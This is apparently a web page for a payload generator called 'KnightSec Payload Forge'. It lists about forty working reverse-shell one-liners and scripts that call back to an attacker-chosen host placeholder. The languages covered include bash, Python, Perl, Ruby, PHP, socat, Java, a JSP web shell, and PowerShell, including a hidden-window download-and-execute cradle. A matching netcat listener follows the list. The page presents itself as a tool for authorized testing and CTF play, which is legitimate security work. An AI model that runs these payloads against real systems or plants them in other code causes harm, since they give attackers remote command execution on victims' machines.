// Tools

KnightSec Payload Forge

Reverse shells, bind shells, web shells, MSFVenom, PowerShell, encoders and file-transfer one-liners — with live LHOST/LPORT substitution, matching listeners, TTY upgrade steps, and educational breakdowns.

For authorized security testing, CTF play and educational use only. You are responsible for ensuring you have permission to test any system you target. KnightSec assumes no liability for misuse.

forge
SHELL

// set LHOST to see substituted payloads

// Shells that connect back to your listener. Requires outbound TCP from the target.

40 payloads
Bash /dev/tcpbashMEDIUM
bash
bash -i >& /dev/tcp/{LHOST}/4444 0>&1
Encode:
Bash /dev/tcp (fd 196)bashMEDIUM
bash
exec 196<>/dev/tcp/{LHOST}/4444; bash <&196 >&196 2>&196
Encode:
Bash mkfifobashMEDIUM
bash
mkfifo /tmp/f; bash -i <>/tmp/f 2>&1 | nc {LHOST} 4444 >/tmp/f; rm /tmp/f
Encode:
Bash /dev/udpbashQUIET
bash
bash -i >& /dev/udp/{LHOST}/4444 0>&1
sh /dev/tcpshMEDIUM
sh
0<&196; exec 196<>/dev/tcp/{LHOST}/4444; sh <&196 >&196 2>&196
Encode:
sh mkfifoshMEDIUM
sh
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc {LHOST} 4444 > /tmp/f
Encode:
BusyBox nc -eshMEDIUM
sh
busybox nc {LHOST} 4444 -e sh
Python 2 TCPpython2MEDIUM
python2
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Encode:
Python 3 TCPpython3MEDIUM
python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Encode:
Python 3 (env vars)python3QUIET
python3
export RHOST="{LHOST}"; export RPORT=4444; python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Python 3 (compact)python3MEDIUM
python3
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("{LHOST}",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
Encode:
Perl TCPperlMEDIUM
perl
perl -e 'use Socket;$i="{LHOST}";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
Encode:
Perl IO::SocketperlMEDIUM
perl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{LHOST}:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Ruby TCPrubyMEDIUM
ruby
ruby -rsocket -e'f=TCPSocket.open("{LHOST}",4444).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'
Encode:
Ruby Open3rubyMEDIUM
ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{LHOST}","4444");$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.empty?;(IO.popen(l,&method(:print))rescue nil)}'
PHP exec()phpLOUD
php
php -r '$sock=fsockopen("{LHOST}",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
Encode:
PHP passthru()phpLOUD
php
php -r '$sock=fsockopen("{LHOST}",4444);passthru("/bin/bash -i <&3 >&3 2>&3");'
PHP system()phpLOUD
php
php -r '$sock=fsockopen("{LHOST}",4444);system("/bin/bash -i <&3 >&3 2>&3");'
PHP popen()phpLOUD
php
php -r '$sock=fsockopen("{LHOST}",4444);popen("/bin/bash -i <&3 >&3 2>&3","r");'
nc -ebashLOUD
bash
nc -e /bin/bash {LHOST} 4444
nc mkfifo (no -e)bashMEDIUM
bash
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc {LHOST} 4444 > /tmp/f
Encode:
ncat -ebashLOUD
bash
ncat {LHOST} 4444 -e /bin/bash
ncat UDPbashQUIET
bash
ncat --udp {LHOST} 4444 -e /bin/bash
Telnet mkfifobashMEDIUM
bash
TF=$(mktemp -u); mkfifo $TF && telnet {LHOST} 4444 0<$TF | /bin/bash 1>$TF
OpenSSL (encrypted)bashQUIET
bash
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:4444 > /tmp/s; rm /tmp/s
Socat TCPbashMEDIUM
bash
socat TCP:{LHOST}:4444 EXEC:/bin/bash
Socat PTY (fully interactive)bashMEDIUM
bash
socat TCP:{LHOST}:4444 EXEC:'/bin/bash,pty,stderr,setsid,sigint,sane'
AWKawkQUIET
awk
awk 'BEGIN{s="/inet/tcp/0/{LHOST}/4444";while(42){do{printf"$ "|&s;s|&getline c;if(c){while((c|&getline)>0)print$0|&s;close(c)}}while(c!="exit")close(s)}}' /dev/null
Lua TCPluaQUIET
lua
lua5.1 -e 'local h,p="{LHOST}",4444;local s=require("socket");local t=s.tcp();t:connect(h,p);while true do local c,_=t:receive();if not c then break end;local f=io.popen(c,"r");local r=f:read("*a");f:close();t:send(r)end;t:close()'
Go (one-shot compile)goMEDIUM
go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","{LHOST}:4444");cmd:=exec.Command("/bin/bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/r.go && go run /tmp/r.go &
Java Runtime.exec()javaLOUD
java
Runtime r=Runtime.getRuntime();Process p=r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();
Java ProcessBuilderjavaLOUD
java
String[] c={"/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/4444;cat <&5|while read l;do $l 2>&5 >&5;done"};ProcessBuilder pb=new ProcessBuilder(c);pb.redirectErrorStream(true);pb.start().waitFor();
MSFVenom WARbashLOUD
bash
msfvenom -p java/shell_reverse_tcp LHOST={LHOST} LPORT=4444 -f war -o shell.war
JSP Reverse ShelljspLOUD
jsp
<%@ page import="java.io.*,java.net.*" %>
<%
  String host = "{LHOST}";
  int port = 4444;
  Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-i"});
  Socket s = new Socket(host, port);
  InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
  OutputStream po = p.getOutputStream(), so = s.getOutputStream();
  while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
  }
  p.destroy(); s.close();
%>
PowerShell TCP SocketpowershellLOUD
powershell
powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TcpClient('{LHOST}',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$rb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($rb,0,$rb.Length);$s.Flush()};$c.Close()"
Encode:
PowerShell IEX CradlepowershellLOUD
powershell
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:4444/shell.ps1')"
Encode:
PowerShell Base64 EncodedpowershellLOUD
powershell
powershell -nop -w hidden -enc {PS-B64}
Encode:
NimnimQUIET
nim
# nim c -r shell.nim
import net, os, osproc, strutils
let s = newSocket()
s.connect("{LHOST}", Port(4444))
while true:
  let cmd = s.recvLine()
  if cmd.strip() == "": continue
  let (output, _) = execCmdEx(cmd.strip())
  s.send(output)
s.close()
DartdartQUIET
dart
// dart run shell.dart
import 'dart:io';
import 'dart:convert';
void main() {
  Socket.connect('{LHOST}', 4444).then((s) {
    s.listen((data) {
      Process.start('/bin/bash', []).then((p) {
        p.stdin.writeln(utf8.decode(data));
        p.stdout.pipe(s);
        p.stderr.pipe(s);
      });
    });
  });
}
V (Vlang)vQUIET
v
// v run shell.v
import net
import os
fn main() {
  mut s := net.dial_tcp('{LHOST}:4444') or { panic(err) }
  for {
    line := s.read_line()
    if line == '' { break }
    res := os.execute(line.trim_space())
    s.write_string(res.output) or {}
  }
}

// Listener

default — copy a payload to sync

rlwrap -cAr nc -lvnp 4444

rlwrap adds readline support (↑↓ history, Ctrl-A/E). Best default.

// COPIED →